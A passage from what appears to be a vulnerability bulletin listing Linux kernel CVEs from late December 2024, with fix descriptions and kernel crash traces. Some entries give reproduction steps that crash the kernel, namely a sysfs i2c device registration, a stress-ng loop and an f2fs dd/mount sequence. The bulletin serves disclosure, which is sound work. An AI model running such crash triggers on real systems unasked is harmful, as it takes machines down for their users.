asm_exc_invalid_op+0x1a/0x20 [ 21.053924] ? media_create_pad_link+0x91/0x2e0 [ 21.054364] ? media_create_pad_link+0x2c4/0x2e0 [ 21.054834] ? media_create_pad_link+0x91/0x2e0 [ 21.055131] ? _raw_spin_unlock+0x1e/0x40 [ 21.055441] ? __v4l2_device_register_subdev+0x202/0x210 [ 21.055837] uvc_mc_register_entities+0x358/0x400 [ 21.056144] uvc_register_chains+0x1fd/0x290 [ 21.056413] uvc_probe+0x380e/0x3dc0 [ 21.056676] ? __lock_acquire+0x5aa/0x26e0 [ 21.056946] ? find_held_lock+0x33/0xa0 [ 21.057196] ? kernfs_activate+0x70/0x80 [ 21.057533] ? usb_match_dy ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56571 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: platform: allegro-dvt: Fix possible memory leak in allocate_buffers_internal() The buffer in the loop should be released under the exception path, otherwise there may be a memory leak here. To mitigate this, free the buffer when allegro_alloc_buffer fails. | 2024-12-27 | not yet calculated | CVE-2024-56572 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: efi/libstub: Free correct pointer on failure cmdline_ptr is an out parameter, which is not allocated by the function itself, and likely points into the caller's stack. cmdline refers to the pool allocation that should be freed when cleaning up after a failure, so pass this instead to free_pool(). | 2024-12-27 | not yet calculated | CVE-2024-56573 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: ts2020: fix null-ptr-deref in ts2020_probe() KASAN reported a null-ptr-deref issue when executing the following command: # echo ts2020 0x20 > /sys/bus/i2c/devices/i2c-0/new_device KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017] CPU: 53 UID: 0 PID: 970 Comm: systemd-udevd Not tainted 6.12.0-rc2+ #24 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009) RIP: 0010:ts2020_probe+0xad/0xe10 [ts2020] RSP: 0018:ffffc9000abbf598 EFLAGS: 00010202 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: ffffffffc0714809 RDX: 0000000000000002 RSI: ffff88811550be00 RDI: 0000000000000010 RBP: ffff888109868800 R08: 0000000000000001 R09: fffff52001577eb6 R10: 0000000000000000 R11: ffffc9000abbff50 R12: ffffffffc0714790 R13: 1ffff92001577eb8 R14: ffffffffc07190d0 R15: 0000000000000001 FS: 00007f95f13b98c0(0000) GS:ffff888149280000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555d2634b000 CR3: 0000000152236000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ts2020_probe+0xad/0xe10 [ts2020] i2c_device_probe+0x421/0xb40 really_probe+0x266/0x850 ... The cause of the problem is that when using sysfs to dynamically register an i2c device, there is no platform data, but the probe process of ts2020 needs to use platform data, resulting in a null pointer being accessed. Solve this problem by adding checks to platform data. | 2024-12-27 | not yet calculated | CVE-2024-56574 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: imx-jpeg: Ensure power suppliers be suspended before detach them The power suppliers are always requested to suspend asynchronously, dev_pm_domain_detach() requires the caller to ensure proper synchronization of this function with power management callbacks. otherwise the detach may led to kernel panic, like below: [ 1457.107934] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000040 [ 1457.116777] Mem abort info: [ 1457.119589] ESR = 0x0000000096000004 [ 1457.123358] EC = 0x25: DABT (current EL), IL = 32 bits [ 1457.128692] SET = 0, FnV = 0 [ 1457.131764] EA = 0, S1PTW = 0 [ 1457.134920] FSC = 0x04: level 0 translation fault [ 1457.139812] Data abort info: [ 1457.142707] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [ 1457.148196] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 1457.153256] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 1457.158563] user pgtable: 4k pages, 48-bit VAs, pgdp=00000001138b6000 [ 1457.165000] [0000000000000040] pgd=0000000000000000, p4d=0000000000000000 [ 1457.171792] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP [ 1457.178045] Modules linked in: v4l2_jpeg wave6_vpu_ctrl(-) [last unloaded: mxc_jpeg_encdec] [ 1457.186383] CPU: 0 PID: 51938 Comm: kworker/0:3 Not tainted 6.6.36-gd23d64eea511 #66 [ 1457.194112] Hardware name: NXP i.MX95 19X19 board (DT) [ 1457.199236] Workqueue: pm pm_runtime_work [ 1457.203247] pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 1457.210188] pc : genpd_runtime_suspend+0x20/0x290 [ 1457.214886] lr : __rpm_callback+0x48/0x1d8 [ 1457.218968] sp : ffff80008250bc50 [ 1457.222270] x29: ffff80008250bc50 x28: 0000000000000000 x27: 0000000000000000 [ 1457.229394] x26: 0000000000000000 x25: 0000000000000008 x24: 00000000000f4240 [ 1457.236518] x23: 0000000000000000 x22: ffff00008590f0e4 x21: 0000000000000008 [ 1457.243642] x20: ffff80008099c434 x19: ffff00008590f000 x18: ffffffffffffffff [ 1457.250766] x17: 5300326563697665 x16: 645f676e696c6f6f x15: 63343a6d726f6674 [ 1457.257890] x14: 0000000000000004 x13: 00000000000003a4 x12: 0000000000000002 [ 1457.265014] x11: 0000000000000000 x10: 0000000000000a60 x9 : ffff80008250bbb0 [ 1457.272138] x8 : ffff000092937200 x7 : ffff0003fdf6af80 x6 : 0000000000000000 [ 1457.279262] x5 : 00000000410fd050 x4 : 0000000000200000 x3 : 0000000000000000 [ 1457.286386] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff00008590f000 [ 1457.293510] Call trace: [ 1457.295946] genpd_runtime_suspend+0x20/0x290 [ 1457.300296] __rpm_callback+0x48/0x1d8 [ 1457.304038] rpm_callback+0x6c/0x78 [ 1457.307515] rpm_suspend+0x10c/0x570 [ 1457.311077] pm_runtime_work+0xc4/0xc8 [ 1457.314813] process_one_work+0x138/0x248 [ 1457.318816] worker_thread+0x320/0x438 [ 1457.322552] kthread+0x110/0x114 [ 1457.325767] ret_from_fork+0x10/0x20 | 2024-12-27 | not yet calculated | CVE-2024-56575 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: i2c: tc358743: Fix crash in the probe error path when using polling If an error occurs in the probe() function, we should remove the polling timer that was alarmed earlier, otherwise the timer is called with arguments that are already freed, which results in a crash. ------------[ cut here ]------------ WARNING: CPU: 3 PID: 0 at kernel/time/timer.c:1830 __run_timers+0x244/0x268 Modules linked in: CPU: 3 UID: 0 PID: 0 Comm: swapper/3 Not tainted 6.11.0 #226 Hardware name: Diasom DS-RK3568-SOM-EVB (DT) pstate: 804000c9 (Nzcv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __run_timers+0x244/0x268 lr : __run_timers+0x1d4/0x268 sp : ffffff80eff2baf0 x29: ffffff80eff2bb50 x28: 7fffffffffffffff x27: ffffff80eff2bb00 x26: ffffffc080f669c0 x25: ffffff80efef6bf0 x24: ffffff80eff2bb00 x23: 0000000000000000 x22: dead000000000122 x21: 0000000000000000 x20: ffffff80efef6b80 x19: ffffff80041c8bf8 x18: ffffffffffffffff x17: ffffffc06f146000 x16: ffffff80eff27dc0 x15: 000000000000003e x14: 0000000000000000 x13: 00000000000054da x12: 0000000000000000 x11: 00000000000639c0 x10: 000000000000000c x9 : 0000000000000009 x8 : ffffff80eff2cb40 x7 : ffffff80eff2cb40 x6 : ffffff8002bee480 x5 : ffffffc080cb2220 x4 : ffffffc080cb2150 x3 : 00000000000f4240 x2 : 0000000000000102 x1 : ffffff80eff2bb00 x0 : ffffff80041c8bf0 Call trace: __run_timers+0x244/0x268 timer_expire_remote+0x50/0x68 tmigr_handle_remote+0x388/0x39c run_timer_softirq+0x38/0x44 handle_softirqs+0x138/0x298 __do_softirq+0x14/0x20 ____do_softirq+0x10/0x1c call_on_irq_stack+0x24/0x4c do_softirq_own_stack+0x1c/0x2c irq_exit_rcu+0x9c/0xcc el1_interrupt+0x48/0xc0 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x7c/0x80 default_idle_call+0x34/0x68 do_idle+0x23c/0x294 cpu_startup_entry+0x38/0x3c secondary_start_kernel+0x128/0x160 __secondary_switched+0xb8/0xbc ---[ end trace 0000000000000000 ]--- | 2024-12-27 | not yet calculated | CVE-2024-56576 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: mtk-jpeg: Fix null-ptr-deref during unload module The workqueue should be destroyed in mtk_jpeg_core.c since commit 09aea13ecf6f ("media: mtk-jpeg: refactor some variables"), otherwise the below calltrace can be easily triggered. [ 677.862514] Unable to handle kernel paging request at virtual address dfff800000000023 [ 677.863633] KASAN: null-ptr-deref in range [0x0000000000000118-0x000000000000011f] ... [ 677.879654] CPU: 6 PID: 1071 Comm: modprobe Tainted: G O 6.8.12-mtk+gfa1a78e5d24b+ #17 ... [ 677.882838] pc : destroy_workqueue+0x3c/0x770 [ 677.883413] lr : mtk_jpegdec_destroy_workqueue+0x70/0x88 [mtk_jpeg_dec_hw] [ 677.884314] sp : ffff80008ad974f0 [ 677.884744] x29: ffff80008ad974f0 x28: ffff0000d7115580 x27: ffff0000dd691070 [ 677.885669] x26: ffff0000dd691408 x25: ffff8000844af3e0 x24: ffff80008ad97690 [ 677.886592] x23: ffff0000e051d400 x22: ffff0000dd691010 x21: dfff800000000000 [ 677.887515] x20: 0000000000000000 x19: 0000000000000000 x18: ffff800085397ac0 [ 677.888438] x17: 0000000000000000 x16: ffff8000801b87c8 x15: 1ffff000115b2e10 [ 677.889361] x14: 00000000f1f1f1f1 x13: 0000000000000000 x12: ffff7000115b2e4d [ 677.890285] x11: 1ffff000115b2e4c x10: ffff7000115b2e4c x9 : ffff80000aa43e90 [ 677.891208] x8 : 00008fffeea4d1b4 x7 : ffff80008ad97267 x6 : 0000000000000001 [ 677.892131] x5 : ffff80008ad97260 x4 : ffff7000115b2e4d x3 : 0000000000000000 [ 677.893054] x2 : 0000000000000023 x1 : dfff800000000000 x0 : 0000000000000118 [ 677.893977] Call trace: [ 677.894297] destroy_workqueue+0x3c/0x770 [ 677.894826] mtk_jpegdec_destroy_workqueue+0x70/0x88 [mtk_jpeg_dec_hw] [ 677.895677] devm_action_release+0x50/0x90 [ 677.896211] release_nodes+0xe8/0x170 [ 677.896688] devres_release_all+0xf8/0x178 [ 677.897219] device_unbind_cleanup+0x24/0x170 [ 677.897785] device_release_driver_internal+0x35c/0x480 [ 677.898461] device_release_driver+0x20/0x38 ... [ 677.912665] ---[ end trace 0000000000000000 ]--- | 2024-12-27 | not yet calculated | CVE-2024-56577 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: imx-jpeg: Set video drvdata before register video device The video drvdata should be set before the video device is registered, otherwise video_drvdata() may return NULL in the open() file ops, and led to oops. | 2024-12-27 | not yet calculated | CVE-2024-56578 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: amphion: Set video drvdata before register video device The video drvdata should be set before the video device is registered, otherwise video_drvdata() may return NULL in the open() file ops, and led to oops. | 2024-12-27 | not yet calculated | CVE-2024-56579 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: qcom: camss: fix error path on configuration of power domains There is a chance to meet runtime issues during configuration of CAMSS power domains, because on the error path dev_pm_domain_detach() is unexpectedly called with NULL or error pointer. One of the simplest ways to reproduce the problem is to probe CAMSS driver before registration of CAMSS power domains, for instance if a platform CAMCC driver is simply not built. Warning backtrace example: Unable to handle kernel NULL pointer dereference at virtual address 00000000000001a2 <snip> pc : dev_pm_domain_detach+0x8/0x48 lr : camss_probe+0x374/0x9c0 <snip> Call trace: dev_pm_domain_detach+0x8/0x48 platform_probe+0x70/0xf0 really_probe+0xc4/0x2a8 __driver_probe_device+0x80/0x140 driver_probe_device+0x48/0x170 __device_attach_driver+0xc0/0x148 bus_for_each_drv+0x88/0xf0 __device_attach+0xb0/0x1c0 device_initial_probe+0x1c/0x30 bus_probe_device+0xb4/0xc0 deferred_probe_work_func+0x90/0xd0 process_one_work+0x164/0x3e0 worker_thread+0x310/0x420 kthread+0x120/0x130 ret_from_fork+0x10/0x20 | 2024-12-27 | not yet calculated | CVE-2024-56580 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: btrfs: ref-verify: fix use-after-free after invalid ref action At btrfs_ref_tree_mod() after we successfully inserted the new ref entry (local variable 'ref') into the respective block entry's rbtree (local variable 'be'), if we find an unexpected action of BTRFS_DROP_DELAYED_REF, we error out and free the ref entry without removing it from the block entry's rbtree. Then in the error path of btrfs_ref_tree_mod() we call btrfs_free_ref_cache(), which iterates over all block entries and then calls free_block_entry() for each one, and there we will trigger a use-after-free when we are called against the block entry to which we added the freed ref entry to its rbtree, since the rbtree still points to the block entry, as we didn't remove it from the rbtree before freeing it in the error path at btrfs_ref_tree_mod(). Fix this by removing the new ref entry from the rbtree before freeing it. Syzbot report this with the following stack traces: BTRFS error (device loop0 state EA): Ref action 2, root 5, ref_root 0, parent 8564736, owner 0, offset 0, num_refs 18446744073709551615 __btrfs_mod_ref+0x7dd/0xac0 fs/btrfs/extent-tree.c:2523 update_ref_for_cow+0x9cd/0x11f0 fs/btrfs/ctree.c:512 btrfs_force_cow_block+0x9f6/0x1da0 fs/btrfs/ctree.c:594 btrfs_cow_block+0x35e/0xa40 fs/btrfs/ctree.c:754 btrfs_search_slot+0xbdd/0x30d0 fs/btrfs/ctree.c:2116 btrfs_insert_empty_items+0x9c/0x1a0 fs/btrfs/ctree.c:4314 btrfs_insert_empty_item fs/btrfs/ctree.h:669 [inline] btrfs_insert_orphan_item+0x1f1/0x320 fs/btrfs/orphan.c:23 btrfs_orphan_add+0x6d/0x1a0 fs/btrfs/inode.c:3482 btrfs_unlink+0x267/0x350 fs/btrfs/inode.c:4293 vfs_unlink+0x365/0x650 fs/namei.c:4469 do_unlinkat+0x4ae/0x830 fs/namei.c:4533 __do_sys_unlinkat fs/namei.c:4576 [inline] __se_sys_unlinkat fs/namei.c:4569 [inline] __x64_sys_unlinkat+0xcc/0xf0 fs/namei.c:4569 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f BTRFS error (device loop0 state EA): Ref action 1, root 5, ref_root 5, parent 0, owner 260, offset 0, num_refs 1 __btrfs_mod_ref+0x76b/0xac0 fs/btrfs/extent-tree.c:2521 update_ref_for_cow+0x96a/0x11f0 btrfs_force_cow_block+0x9f6/0x1da0 fs/btrfs/ctree.c:594 btrfs_cow_block+0x35e/0xa40 fs/btrfs/ctree.c:754 btrfs_search_slot+0xbdd/0x30d0 fs/btrfs/ctree.c:2116 btrfs_lookup_inode+0xdc/0x480 fs/btrfs/inode-item.c:411 __btrfs_update_delayed_inode+0x1e7/0xb90 fs/btrfs/delayed-inode.c:1030 btrfs_update_delayed_inode fs/btrfs/delayed-inode.c:1114 [inline] __btrfs_commit_inode_delayed_items+0x2318/0x24a0 fs/btrfs/delayed-inode.c:1137 __btrfs_run_delayed_items+0x213/0x490 fs/btrfs/delayed-inode.c:1171 btrfs_commit_transaction+0x8a8/0x3740 fs/btrfs/transaction.c:2313 prepare_to_relocate+0x3c4/0x4c0 fs/btrfs/relocation.c:3586 relocate_block_group+0x16c/0xd40 fs/btrfs/relocation.c:3611 btrfs_relocate_block_group+0x77d/0xd90 fs/btrfs/relocation.c:4081 btrfs_relocate_chunk+0x12c/0x3b0 fs/btrfs/volumes.c:3377 __btrfs_balance+0x1b0f/0x26b0 fs/btrfs/volumes.c:4161 btrfs_balance+0xbdc/0x10c0 fs/btrfs/volumes.c:4538 BTRFS error (device loop0 state EA): Ref action 2, root 5, ref_root 0, parent 8564736, owner 0, offset 0, num_refs 18446744073709551615 __btrfs_mod_ref+0x7dd/0xac0 fs/btrfs/extent-tree.c:2523 update_ref_for_cow+0x9cd/0x11f0 fs/btrfs/ctree.c:512 btrfs_force_cow_block+0x9f6/0x1da0 fs/btrfs/ctree.c:594 btrfs_cow_block+0x35e/0xa40 fs/btrfs/ctree.c:754 btrfs_search_slot+0xbdd/0x30d0 fs/btrfs/ctree.c:2116 btrfs_lookup_inode+0xdc/0x480 fs/btrfs/inode-item.c:411 __btrfs_update_delayed_inode+0x1e7/0xb90 fs/btrfs/delayed-inode.c:1030 btrfs_update_delayed_i ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56581 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: btrfs: fix use-after-free in btrfs_encoded_read_endio() Shinichiro reported the following use-after free that sometimes is happening in our CI system when running fstests' btrfs/284 on a TCMU runner device: BUG: KASAN: slab-use-after-free in lock_release+0x708/0x780 Read of size 8 at addr ffff888106a83f18 by task kworker/u80:6/219 CPU: 8 UID: 0 PID: 219 Comm: kworker/u80:6 Not tainted 6.12.0-rc6-kts+ #15 Hardware name: Supermicro Super Server/X11SPi-TF, BIOS 3.3 02/21/2020 Workqueue: btrfs-endio btrfs_end_bio_work [btrfs] Call Trace: <TASK> dump_stack_lvl+0x6e/0xa0 ? lock_release+0x708/0x780 print_report+0x174/0x505 ? lock_release+0x708/0x780 ? __virt_addr_valid+0x224/0x410 ? lock_release+0x708/0x780 kasan_report+0xda/0x1b0 ? lock_release+0x708/0x780 ? __wake_up+0x44/0x60 lock_release+0x708/0x780 ? __pfx_lock_release+0x10/0x10 ? __pfx_do_raw_spin_lock+0x10/0x10 ? lock_is_held_type+0x9a/0x110 _raw_spin_unlock_irqrestore+0x1f/0x60 __wake_up+0x44/0x60 btrfs_encoded_read_endio+0x14b/0x190 [btrfs] btrfs_check_read_bio+0x8d9/0x1360 [btrfs] ? lock_release+0x1b0/0x780 ? trace_lock_acquire+0x12f/0x1a0 ? __pfx_btrfs_check_read_bio+0x10/0x10 [btrfs] ? process_one_work+0x7e3/0x1460 ? lock_acquire+0x31/0xc0 ? process_one_work+0x7e3/0x1460 process_one_work+0x85c/0x1460 ? __pfx_process_one_work+0x10/0x10 ? assign_work+0x16c/0x240 worker_thread+0x5e6/0xfc0 ? __pfx_worker_thread+0x10/0x10 kthread+0x2c3/0x3a0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x31/0x70 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 3661: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0xaa/0xb0 btrfs_encoded_read_regular_fill_pages+0x16c/0x6d0 [btrfs] send_extent_data+0xf0f/0x24a0 [btrfs] process_extent+0x48a/0x1830 [btrfs] changed_cb+0x178b/0x2ea0 [btrfs] btrfs_ioctl_send+0x3bf9/0x5c20 [btrfs] _btrfs_ioctl_send+0x117/0x330 [btrfs] btrfs_ioctl+0x184a/0x60a0 [btrfs] __x64_sys_ioctl+0x12e/0x1a0 do_syscall_64+0x95/0x180 entry_SYSCALL_64_after_hwframe+0x76/0x7e Freed by task 3661: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x70 __kasan_slab_free+0x4f/0x70 kfree+0x143/0x490 btrfs_encoded_read_regular_fill_pages+0x531/0x6d0 [btrfs] send_extent_data+0xf0f/0x24a0 [btrfs] process_extent+0x48a/0x1830 [btrfs] changed_cb+0x178b/0x2ea0 [btrfs] btrfs_ioctl_send+0x3bf9/0x5c20 [btrfs] _btrfs_ioctl_send+0x117/0x330 [btrfs] btrfs_ioctl+0x184a/0x60a0 [btrfs] __x64_sys_ioctl+0x12e/0x1a0 do_syscall_64+0x95/0x180 entry_SYSCALL_64_after_hwframe+0x76/0x7e The buggy address belongs to the object at ffff888106a83f00 which belongs to the cache kmalloc-rnd-07-96 of size 96 The buggy address is located 24 bytes inside of freed 96-byte region [ffff888106a83f00, ffff888106a83f60) The buggy address belongs to the physical page: page: refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff888106a83800 pfn:0x106a83 flags: 0x17ffffc0000000(node=0|zone=2|lastcpupid=0x1fffff) page_type: f5(slab) raw: 0017ffffc0000000 ffff888100053680 ffffea0004917200 0000000000000004 raw: ffff888106a83800 0000000080200019 00000001f5000000 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff888106a83e00: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc ffff888106a83e80: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc >ffff888106a83f00: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc ^ ffff888106a83f80: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc ffff888106a84000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ================================================================== Further analyzing the trace and ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56582 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: sched/deadline: Fix warning in migrate_enable for boosted tasks When running the following command: while true; do stress-ng --cyclic 30 --timeout 30s --minimize --quiet done a warning is eventually triggered: WARNING: CPU: 43 PID: 2848 at kernel/sched/deadline.c:794 setup_new_dl_entity+0x13e/0x180 ... Call Trace: <TASK> ? show_trace_log_lvl+0x1c4/0x2df ? enqueue_dl_entity+0x631/0x6e0 ? setup_new_dl_entity+0x13e/0x180 ? __warn+0x7e/0xd0 ? report_bug+0x11a/0x1a0 ? handle_bug+0x3c/0x70 ? exc_invalid_op+0x14/0x70 ? asm_exc_invalid_op+0x16/0x20 enqueue_dl_entity+0x631/0x6e0 enqueue_task_dl+0x7d/0x120 __do_set_cpus_allowed+0xe3/0x280 __set_cpus_allowed_ptr_locked+0x140/0x1d0 __set_cpus_allowed_ptr+0x54/0xa0 migrate_enable+0x7e/0x150 rt_spin_unlock+0x1c/0x90 group_send_sig_info+0xf7/0x1a0 ? kill_pid_info+0x1f/0x1d0 kill_pid_info+0x78/0x1d0 kill_proc_info+0x5b/0x110 __x64_sys_kill+0x93/0xc0 do_syscall_64+0x5c/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76 RIP: 0033:0x7f0dab31f92b This warning occurs because set_cpus_allowed dequeues and enqueues tasks with the ENQUEUE_RESTORE flag set. If the task is boosted, the warning is triggered. A boosted task already had its parameters set by rt_mutex_setprio, and a new call to setup_new_dl_entity is unnecessary, hence the WARN_ON call. Check if we are requeueing a boosted task and avoid calling setup_new_dl_entity if that's the case. | 2024-12-27 | not yet calculated | CVE-2024-56583 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: io_uring/tctx: work around xa_store() allocation error issue syzbot triggered the following WARN_ON: WARNING: CPU: 0 PID: 16 at io_uring/tctx.c:51 __io_uring_free+0xfa/0x140 io_uring/tctx.c:51 which is the WARN_ON_ONCE(!xa_empty(&tctx->xa)); sanity check in __io_uring_free() when a io_uring_task is going through its final put. The syzbot test case includes injecting memory allocation failures, and it very much looks like xa_store() can fail one of its memory allocations and end up with ->head being non-NULL even though no entries exist in the xarray. Until this issue gets sorted out, work around it by attempting to iterate entries in our xarray, and WARN_ON_ONCE() if one is found. | 2024-12-27 | not yet calculated | CVE-2024-56584 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: LoongArch: Fix sleeping in atomic context for PREEMPT_RT Commit bab1c299f3945ffe79 ("LoongArch: Fix sleeping in atomic context in setup_tlb_handler()") changes the gfp flag from GFP_KERNEL to GFP_ATOMIC for alloc_pages_node(). However, for PREEMPT_RT kernels we can still get a "sleeping in atomic context" error: [ 0.372259] BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48 [ 0.372266] in_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 0, name: swapper/1 [ 0.372268] preempt_count: 1, expected: 0 [ 0.372270] RCU nest depth: 1, expected: 1 [ 0.372272] 3 locks held by swapper/1/0: [ 0.372274] #0: 900000000c9f5e60 (&pcp->lock){+.+.}-{3:3}, at: get_page_from_freelist+0x524/0x1c60 [ 0.372294] #1: 90000000087013b8 (rcu_read_lock){....}-{1:3}, at: rt_spin_trylock+0x50/0x140 [ 0.372305] #2: 900000047fffd388 (&zone->lock){+.+.}-{3:3}, at: __rmqueue_pcplist+0x30c/0xea0 [ 0.372314] irq event stamp: 0 [ 0.372316] hardirqs last enabled at (0): [<0000000000000000>] 0x0 [ 0.372322] hardirqs last disabled at (0): [<9000000005947320>] copy_process+0x9c0/0x26e0 [ 0.372329] softirqs last enabled at (0): [<9000000005947320>] copy_process+0x9c0/0x26e0 [ 0.372335] softirqs last disabled at (0): [<0000000000000000>] 0x0 [ 0.372341] CPU: 1 UID: 0 PID: 0 Comm: swapper/1 Not tainted 6.12.0-rc7+ #1891 [ 0.372346] Hardware name: Loongson Loongson-3A5000-7A1000-1w-CRB/Loongson-LS3A5000-7A1000-1w-CRB, BIOS vUDK2018-LoongArch-V2.0.0-prebeta9 10/21/2022 [ 0.372349] Stack : 0000000000000089 9000000005a0db9c 90000000071519c8 9000000100388000 [ 0.372486] 900000010038b890 0000000000000000 900000010038b898 9000000007e53788 [ 0.372492] 900000000815bcc8 900000000815bcc0 900000010038b700 0000000000000001 [ 0.372498] 0000000000000001 4b031894b9d6b725 00000000055ec000 9000000100338fc0 [ 0.372503] 00000000000000c4 0000000000000001 000000000000002d 0000000000000003 [ 0.372509] 0000000000000030 0000000000000003 00000000055ec000 0000000000000003 [ 0.372515] 900000000806d000 9000000007e53788 00000000000000b0 0000000000000004 [ 0.372521] 0000000000000000 0000000000000000 900000000c9f5f10 0000000000000000 [ 0.372526] 90000000076f12d8 9000000007e53788 9000000005924778 0000000000000000 [ 0.372532] 00000000000000b0 0000000000000004 0000000000000000 0000000000070000 [ 0.372537] ... [ 0.372540] Call Trace: [ 0.372542] [<9000000005924778>] show_stack+0x38/0x180 [ 0.372548] [<90000000071519c4>] dump_stack_lvl+0x94/0xe4 [ 0.372555] [<900000000599b880>] __might_resched+0x1a0/0x260 [ 0.372561] [<90000000071675cc>] rt_spin_lock+0x4c/0x140 [ 0.372565] [<9000000005cbb768>] __rmqueue_pcplist+0x308/0xea0 [ 0.372570] [<9000000005cbed84>] get_page_from_freelist+0x564/0x1c60 [ 0.372575] [<9000000005cc0d98>] __alloc_pages_noprof+0x218/0x1820 [ 0.372580] [<900000000593b36c>] tlb_init+0x1ac/0x298 [ 0.372585] [<9000000005924b74>] per_cpu_trap_init+0x114/0x140 [ 0.372589] [<9000000005921964>] cpu_probe+0x4e4/0xa60 [ 0.372592] [<9000000005934874>] start_secondary+0x34/0xc0 [ 0.372599] [<900000000715615c>] smpboot_entry+0x64/0x6c This is because in PREEMPT_RT kernels normal spinlocks are replaced by rt spinlocks and rt_spin_lock() will cause sleeping. Fix it by disabling NUMA optimization completely for PREEMPT_RT kernels. | 2024-12-27 | not yet calculated | CVE-2024-56585 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: f2fs: fix f2fs_bug_on when uninstalling filesystem call f2fs_evict_inode. creating a large files during checkpoint disable until it runs out of space and then delete it, then remount to enable checkpoint again, and then unmount the filesystem triggers the f2fs_bug_on as below: ------------[ cut here ]------------ kernel BUG at fs/f2fs/inode.c:896! CPU: 2 UID: 0 PID: 1286 Comm: umount Not tainted 6.11.0-rc7-dirty #360 Oops: invalid opcode: 0000 [#1] PREEMPT SMP NOPTI RIP: 0010:f2fs_evict_inode+0x58c/0x610 Call Trace: __die_body+0x15/0x60 die+0x33/0x50 do_trap+0x10a/0x120 f2fs_evict_inode+0x58c/0x610 do_error_trap+0x60/0x80 f2fs_evict_inode+0x58c/0x610 exc_invalid_op+0x53/0x60 f2fs_evict_inode+0x58c/0x610 asm_exc_invalid_op+0x16/0x20 f2fs_evict_inode+0x58c/0x610 evict+0x101/0x260 dispose_list+0x30/0x50 evict_inodes+0x140/0x190 generic_shutdown_super+0x2f/0x150 kill_block_super+0x11/0x40 kill_f2fs_super+0x7d/0x140 deactivate_locked_super+0x2a/0x70 cleanup_mnt+0xb3/0x140 task_work_run+0x61/0x90 The root cause is: creating large files during disable checkpoint period results in not enough free segments, so when writing back root inode will failed in f2fs_enable_checkpoint. When umount the file system after enabling checkpoint, the root inode is dirty in f2fs_evict_inode function, which triggers BUG_ON. The steps to reproduce are as follows: dd if=/dev/zero of=f2fs.img bs=1M count=55 mount f2fs.img f2fs_dir -o checkpoint=disable:10% dd if=/dev/zero of=big bs=1M count=50 sync rm big mount -o remount,checkpoint=enable f2fs_dir umount f2fs_dir Let's redirty inode when there is not free segments during checkpoint is disable. | 2024-12-27 | not yet calculated | CVE-2024-56586 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: leds: class: Protect brightness_show() with led_cdev->led_access mutex There is NULL pointer issue observed if from Process A where hid device being added which results in adding a led_cdev addition and later a another call to access of led_cdev attribute from Process B can result in NULL pointer issue. Use mutex led_cdev->led_access to protect access to led->cdev and its attribute inside brightness_show() and max_brightness_show() and also update the comment for mutex that it should be used to protect the led class device fields. Process A Process B kthread+0x114 worker_thread+0x244 process_scheduled_works+0x248 uhid_device_add_worker+0x24 hid_add_device+0x120 device_add+0x268 bus_probe_device+0x94 device_initial_probe+0x14 __device_attach+0xfc bus_for_each_drv+0x10c __device_attach_driver+0x14c driver_probe_device+0x3c __driver_probe_device+0xa0 really_probe+0x190 hid_device_probe+0x130 ps_probe+0x990 ps_led_register+0x94 devm_led_classdev_register_ext+0x58 led_classdev_register_ext+0x1f8 device_create_with_groups+0x48 device_create_groups_vargs+0xc8 device_add+0x244 kobject_uevent+0x14 kobject_uevent_env[jt]+0x224 